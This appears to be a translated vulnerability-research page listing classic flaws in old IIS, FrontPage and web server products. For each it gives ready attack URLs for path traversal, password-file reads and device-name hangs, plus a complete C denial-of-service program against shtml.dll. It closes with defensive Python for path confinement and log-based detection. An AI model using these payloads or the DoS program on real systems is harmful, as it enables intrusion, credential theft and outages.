Some of the classic vulnerabilities collected (page 1 of 2) _ Vulnerability Research

Source: Internet
Author: User
Tags: http request, readable, strlen, sybase
☆carbo.dll☆
ICat Carbo Server is an online shopping program, rated by PC Magazine as the best online shopping software. Security researcher Mikael Johansson found a vulnerability in ICat Carbo Server version 3.0.0.

This vulnerability allows anyone to view any file on the system (except files whose names contain certain special characters).
Attack Method:

Submit an HTTP request such as:
http://host/carbo.dll?icatcommand=file_to_view&catalogname=catalog

The server responds with:
[ICat Carbo Server (ISAPI, release) Version 3.0.0 Release build 244]

Error: (-1007) cannot open file 'C:\web\carbohome\file_to_view.htm'

The error message reveals the physical web directory and shows that the icatcommand value is used directly to build a file path; ..\ sequences in it are not filtered. To view the win.ini file (C:\winnt\win.ini):

http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog
___________________________________________________________________________
☆uploader.exe☆

If you use NT as your web server operating system, intruders can upload arbitrary files using uploader.exe.
Attack method: http://host/cgi-win/uploader.exe
takes you to the upload page; the rest needs no explanation. :)
___________________________________________________________________________
☆search97.vts☆

This file lets an intruder read any file on your system that the httpd user can read.
Attack method:
http://www.xxx.com/search97.vts?hlnavigate=on&querytext=dcm&serverkey=primary&resulttemplate=../../../../../../../etc/passwd&resultstyle=simple&resultcount=20&collection=books

The resulttemplate parameter is treated as a file path, so the ../ sequences walk out of the template directory and the server returns /etc/passwd in place of a result template.
___________________________________________________________________________
☆newdsn.exe☆

The newdsn.exe file in the /scripts/tools directory allows any user to create arbitrary files under the web root directory. In addition, under certain conditions, newdsn.exe can be used to mount a denial-of-service attack on IIS which, if successful, causes IIS to stop responding to connection requests.
Attack method:
1. Create a file:
http://xxx.xxx.xxx.xxx/scripts/tools/newdsn.exe?driver=Microsoft+Access+Driver+(*.mdb)&dsn=evil2+Samples+from+microsoft&dbq=../../evil2.htm&newdb=create_db&attr=
The dbq parameter is the path of the Access database file to create; it is not confined to the intended directory, so the ../ sequences place the new file (here evil2.htm) under the web root.
2. DoS attack: submit the following request:
http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase

If the IIS version is affected, the browser displays nothing. A denial of service then results in either of the following two cases:

- Restarting the WWW service: IIS hangs. The WWW service cannot be restarted and keeps reporting a "port is already occupied" error.
- Stopping the WWW service: IIS stops, but the database part of IIS is not dead and still responds to requests on port 80.

If you then submit the same request again:
http://www.example.com/Scripts/Tools/Newdsn.exe?Createdatabase
IIS crashes with a protection fault.
___________________________________________________________________________
☆service.pwd☆

If http://www.hostname.com/_vti_pvt/service.pwd can be read, user password information is exposed.
Attack method:
Request http://host/_vti_pvt/service.pwd. service.pwd is the FrontPage password file; if a careless administrator has not set permissions on it, the browser displays the remote site's password file.

___________________________________________________________________________
☆users.pwd☆

On UNIX systems, http://www.hostname.com/_vti_pvt/users.pwd is readable, exposing user password information.
Attack method:
Request http://www.hostname.com/_vti_pvt/users.pwd.

___________________________________________________________________________
☆authors.pwd☆

On UNIX systems, http://www.hostname.com/_vti_pvt/authors.pwd is readable, exposing user password information.
Attack method:
Request http://www.hostname.com/_vti_pvt/authors.pwd.
___________________________________________________________________________
☆administrators.pwd☆

On UNIX systems, http://www.hostname.com/_vti_pvt/administrators.pwd is readable, exposing user password information.
Attack method:
Request http://www.hostname.com/_vti_pvt/administrators.pwd.

___________________________________________________________________________
☆shtml.dll☆

Requesting a nonexistent file through the FrontPage Server Extensions on a Windows 2000 server returns the local path of the web directory. Requesting a file whose name does not end in .html, .shtml or .asp returns different information. The error page also enables cross-site scripting: if a user clicks a crafted link pointing at a trusted server (http://TrustedServer), the script in the link travels from the client to the trusted site in the HTTP request and comes back to the client as part of the error message. When the client receives the error page containing the script, it executes the script with all the rights of content from the trusted site. Apart from that, shtml.dll accepts and processes arbitrarily long file names as long as they end in an HTML suffix; this can be used to mount a DoS attack on the IIS server. The program below drives the target server's CPU usage to 100% and fills the application log; within a few minutes the system reports that the application log is full.
Attack method:
1. Path exposure: http://www.victim.com/_vti_bin/shtml.dll/something.html
returns the following:
Cannot open "d:\inetpub\wwwroot\postinfo1.html": No such file or folder.
2. Script execution via the trusted site: use a URL in the following format:
3. Denial of service: the Winsock C program below sends shtml.dll a single GET whose file name is 7000 repetitions of "postinfdddddddddd" ending in tzl.html (about 119 KB). The listing as printed here lacked its declarations and the definition of plusvuln; those are supplied below, with plusvuln assumed to be the start of the GET line.

    #include <stdio.h>
    #include <string.h>
    #include <winsock2.h>
    #pragma comment(lib, "ws2_32.lib")

    /* Assumed: the original definition of plusvuln is not on the page. It is
       taken to be the start of the request line, so that the junk name and
       the final "tzl.html" form one long HTML file name under shtml.dll. */
    static const char *plusvuln = "GET /_vti_bin/shtml.dll/";

    static void shtml_dos(const char *target_ip)
    {
        WSADATA wsa;
        SOCKET sockfd;
        struct sockaddr_in serv_addr;
        char buffer[2001];
        int lLen, lDo;

        if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
            printf("WSAStartup failed\n");
            return;
        }
        memset(&serv_addr, 0, sizeof(serv_addr));
        serv_addr.sin_family = AF_INET;
        serv_addr.sin_addr.s_addr = inet_addr(target_ip);
        serv_addr.sin_port = htons(80);

        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET) {
            printf("Create socket failed\n");
            WSACleanup();
            return;
        }

        if (connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
            printf("Connect failed\n");
        } else {
            /* request line prefix, then 7000 x 17 bytes of file name, then the
               .html suffix that makes shtml.dll process the name */
            lLen = send(sockfd, plusvuln, (int)strlen(plusvuln), 0);
            for (lDo = 0; lDo < 7000; lDo++) {
                lLen = send(sockfd, "postinfdddddddddd", (int)strlen("postinfdddddddddd"), 0);
                if (lLen < 0) {
                    printf("Send failed\n");
                    closesocket(sockfd);
                    WSACleanup();
                    return;
                }
            }
            lLen = send(sockfd, "tzl.html HTTP/1.0\r\n\r\n",
                        (int)strlen("tzl.html HTTP/1.0\r\n\r\n"), 0);
            lLen = recv(sockfd, buffer, sizeof(buffer) - 1, 0);
            if (lLen > 0) {
                buffer[lLen] = '\0';
                /* print with a format string: the response is server-controlled */
                printf("%s\n", buffer);
            }
        }
        closesocket(sockfd);
        WSACleanup();
    }

    int main(void)
    {
        shtml_dos("192.168.0.131");   /* target address from the original listing */
        return 0;
    }


___________________________________________________________________________
☆shtml.exe☆

Microsoft's FrontPage Server Extensions have a remote denial-of-service vulnerability that can remotely shut down all FrontPage operations on a web site.
By submitting a link that contains a DOS device name, the FrontPage Server Extensions hang and no longer respond to subsequent requests. To restore normal operation, IIS must be restarted or the machine rebooted.
Attack method:
Submitting links such as the following may cause the FrontPage Server Extensions to stop responding:
http://www.example.com/_vti_bin/shtml.exe/com1.htm
http://www.example.com/_vti_bin/shtml.exe/prn.htm
http://www.example.com/_vti_bin/shtml.exe/aux.htm
http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm
http://www.example.com/_vti_bin/shtml.exe/com1.asp
http://www.example.com/_vti_bin/shtml.exe/com1.
The extension does not matter: Windows treats any file name whose base name is a reserved device name (prn.anything.here.htm, com1.) as a reference to the device itself.
___________________________________________________________________________
☆queryhit.htm☆

If queryhit.htm is a search page, you can search for and view files through it.
Attack method:
Open http://www.victim.com/samples/search/queryhit.htm. If it is a search page, enter the following string in the Find File dialog box:
#filename=*.pwd
If a long list of files with the .pwd extension (password files) is displayed, that is what you are after.
___________________________________________________________________________
☆dotdotdot☆

The vqServer and Sybase PowerDynamo web servers are vulnerable to an old attack based on runs of dots (...). Windows interprets consecutive dots as climbing more than one directory: 'cd ...' is treated as 'cd ..\..'. Old versions of Sybase PowerDynamo and vqServer pass such paths through unchanged, so a remote attacker can bypass the web server's security checks and traverse into other directories.
Attack method:
If config.sys exists in the root directory, you can read the file:
http://example.com/...................../config.sys
List the root directory:
http://example.com//.../../../../../../
___________________________________________________________________________
☆autoexec.bat☆

This security issue is present on many web servers, such as the Jana Webserver and the URL Live 1.0 Webserver. A malicious user can exploit it to leave the HTTP root directory and reach higher levels of the directory tree. Using ../ in the URL, an attacker can obtain any file the web server has permission to read.
Attack method: http://host:8080/./../../autoexec.bat reads the autoexec.bat file from the drive root.
Exploitation also depends on the layout of the system's directories.
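The carbo.dll, search97.vts, newdsn.exe, dotdotdot and autoexec.bat sections all come down to the same defect: a server builds a file path from request input without canonicalizing it first. The following Python is an added example, not code from this page or from any of the products named. It models the Windows dot-run shortcut the dotdotdot section describes, shows that a typical "reject '..' components" filter misses three of the page's own payloads, and implements the root-confinement check these servers lacked. The web root /var/www/html and all function names are assumptions.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

WEB_ROOT = "/var/www/html"   # assumed web root for the example


def naive_blocks(raw: str) -> bool:
    """A typical 1990s check: reject the request if any '/'-separated
    component is exactly '..'. It misses backslashes, percent-encoding and
    the Windows dot-run shortcut."""
    return ".." in raw.split("/")


def decode_request_path(raw: str) -> str:
    """Decode the path the way the server will see it on disk: undo URL
    encoding twice (to see through %252e%252e) and treat backslashes as
    separators, since Windows-hosted servers accept both."""
    return unquote(unquote(raw)).replace("\\", "/")


def expand_dot_runs(path: str) -> str:
    """Model the Windows behaviour the dotdotdot section relies on: a path
    component of n >= 3 dots climbs n-1 directories ('...' == '../..').
    Returns an equivalent path written only with '..' components."""
    parts = []
    for comp in path.split("/"):
        if len(comp) >= 3 and set(comp) == {"."}:
            parts.extend([".."] * (len(comp) - 1))
        else:
            parts.append(comp)
    return "/".join(parts)


def resolve_under_root(root: str, requested: str) -> Optional[str]:
    """Return the absolute on-disk path if the decoded request stays inside
    root, otherwise None: canonicalize first, then compare prefixes. This is
    the confinement check the servers on this page did not perform."""
    decoded = expand_dot_runs(decode_request_path(requested))
    candidate = posixpath.normpath(posixpath.join(root, decoded.lstrip("/")))
    root_n = posixpath.normpath(root)
    if candidate == root_n or candidate.startswith(root_n + "/"):
        return candidate
    return None


# Payloads taken from the sections of this page (constructed test inputs)
PAYLOADS = [
    "..\\..\\winnt\\win.ini",              # carbo.dll: Windows separators
    "../../../../../../../etc/passwd",     # search97.vts resulttemplate
    "%2e%2e/%2e%2e/autoexec.bat",          # percent-encoded ../../
    "...................../config.sys",    # dotdotdot: one run of 21 dots
    "./../../autoexec.bat",                # Jana / URL Live
]


def audit(root: str = WEB_ROOT):
    """Run both checks on every payload; returns (naive_blocked, resolved)."""
    return [(naive_blocks(p), resolve_under_root(root, p)) for p in PAYLOADS]


if __name__ == "__main__":
    for payload, (blocked, resolved) in zip(PAYLOADS, audit()):
        print(f"{payload:36} naive_blocks={blocked!s:5} resolved={resolved}")
```

The naive filter stops only the two payloads that spell out a plain ".." component; the backslash, percent-encoded and dot-run forms sail through it, while resolve_under_root rejects all five because it decides on the canonical path rather than on the raw string.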
___________________________________________________________________________
☆achg.htr aexp.htr aexp2.htr aexp2b.htr aexp3.htr aexp4.htr aexp4b.htr anot.htr anot3.htr☆

An interesting feature of IIS 4.0 is that it lets a remote user attack user accounts on the web server; this means that even a web server reached through NAT can be attacked. Every IIS 4.0 installation has a virtual directory /iisadmpwd containing several .htr files that anonymous users are allowed to access. These files are meant to be reachable only from the loopback address (127.0.0.1), yet requesting them pops up a dialog that lets you change a user's account password over the web.
The directory is physically mapped to:
C:\winnt\system32\inetsrv\iisadmpwd
Attack method:
Visit the http://example.com/iisadmpwd/*.htr pages and brute-force the account passwords with a tool.
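As an added example (not from this page or from any product it names), the following Python turns the probes collected above into detection logic and runs it over constructed web server log lines: the FrontPage _vti_pvt password files, the /iisadmpwd .htr pages, newdsn.exe, carbo.dll, search97.vts, uploader.exe, shtml.dll path disclosure, the oversized request of the shtml.dll DoS program, shtml.exe with DOS device names, and dot-run traversal in either the URI stem or a query value. The simplified log layout (date time client-ip method uri-stem uri-query status), the 1024-byte size threshold and every sample line are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote

# Windows reserved device names. A path component whose base name (the part
# before the first dot) is one of these refers to the device, which is why
# shtml.exe/prn.anything.here.htm hangs the extensions just like shtml.exe/prn.htm.
DOS_DEVICES = ({"con", "prn", "aux", "nul"}
               | {f"com{i}" for i in range(1, 10)}
               | {f"lpt{i}" for i in range(1, 10)})

# Probe signatures taken from the sections of this page, matched on the URI stem
SIGNATURES = [
    ("frontpage-password-file",
     re.compile(r"/_vti_pvt/(service|users|authors|administrators)\.pwd$", re.I)),
    ("iisadmpwd-htr", re.compile(r"/iisadmpwd/[^/]+\.htr$", re.I)),
    ("newdsn-create", re.compile(r"/scripts/tools/newdsn\.exe$", re.I)),
    ("shtml-path-disclosure", re.compile(r"/_vti_bin/shtml\.dll/", re.I)),
    ("uploader-exe", re.compile(r"/cgi-win/uploader\.exe$", re.I)),
    ("carbo-dll", re.compile(r"/carbo\.dll$", re.I)),
    ("search97-vts", re.compile(r"/search97\.vts$", re.I)),
]
# '..' or a longer run of dots used as a path component, in the stem or a query value
TRAVERSAL = re.compile(r"(?:^|[/\\=&])\.{2,}(?:[/\\]|$)")
OVERSIZED_URI = 1024   # assumed threshold; the shtml.dll DoS program sends ~119 KB


def references_dos_device(path: str) -> bool:
    """True if any component of path names a Windows device, whatever its extension."""
    return any(comp.split(".")[0].lower() in DOS_DEVICES
               for comp in re.split(r"[/\\]", path))


def classify(stem: str, query: str) -> list:
    """Return the list of probe names a request matches (empty if benign)."""
    stem_d = unquote(unquote(stem))      # decode twice to see through %25xx
    query_d = unquote(unquote(query))
    hits = [name for name, rx in SIGNATURES if rx.search(stem_d)]
    if TRAVERSAL.search(stem_d) or TRAVERSAL.search(query_d):
        hits.append("path-traversal")
    low = stem_d.lower()
    marker = "/_vti_bin/shtml.exe/"
    if marker in low and references_dos_device(low.split(marker, 1)[1]):
        hits.append("shtml-dos-device")
    if len(stem_d) > OVERSIZED_URI:
        hits.append("oversized-uri")
    return hits


def scan_log(text: str) -> list:
    """Parse 'date time client-ip method uri-stem uri-query status' lines and
    return (client-ip, stem, hits) for every request matching a probe."""
    findings = []
    for line in text.splitlines():
        fields = line.split(" ")
        if len(fields) < 7:
            continue
        _date, _time, ip, _method, stem, query, _status = fields[:7]
        hits = classify(stem, "" if query == "-" else query)
        if hits:
            findings.append((ip, stem, hits))
    return findings


# Constructed sample log: benign requests mixed with the probes from this page
SAMPLE_LOG = "\n".join([
    "2000-05-01 10:00:01 10.1.1.5 GET /index.html - 200",
    "2000-05-01 10:00:02 10.1.1.5 GET /_vti_pvt/service.pwd - 200",
    "2000-05-01 10:00:03 10.1.1.7 GET /_vti_bin/shtml.exe/prn.anything.here.htm - 500",
    "2000-05-01 10:00:04 10.1.1.7 GET /scripts/tools/newdsn.exe "
    "driver=Microsoft+Access+Driver+(*.mdb)&dsn=evil2&dbq=../../evil2.htm&newdb=create_db 200",
    "2000-05-01 10:00:05 10.1.1.9 GET /carbo.dll "
    "icatcommand=..%5c..%5cwinnt%5cwin.ini&catalogname=catalog 200",
    "2000-05-01 10:00:06 10.1.1.9 GET /images/logo.gif - 200",
    "2000-05-01 10:00:07 10.1.1.11 GET /iisadmpwd/aexp.htr - 200",
    "2000-05-01 10:00:08 10.1.1.12 GET /...................../config.sys - 404",
    "2000-05-01 10:00:09 10.1.1.13 GET /_vti_bin/shtml.dll/"
    + "postinfdddddddddd" * 100 + "tzl.html - 500",
])

if __name__ == "__main__":
    for ip, stem, hits in scan_log(SAMPLE_LOG):
        print(f"{ip:10} {', '.join(hits):40} {stem[:60]}")
```

The device-name check deliberately ignores the extension, because the page's own examples (prn.anything.here.htm, com1.) show that Windows resolves the base name first; a signature on "com1.htm" alone would miss them. Matching traversal in query values as well as the stem is what catches the carbo.dll and newdsn.exe forms, where the path never appears in the URI itself.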
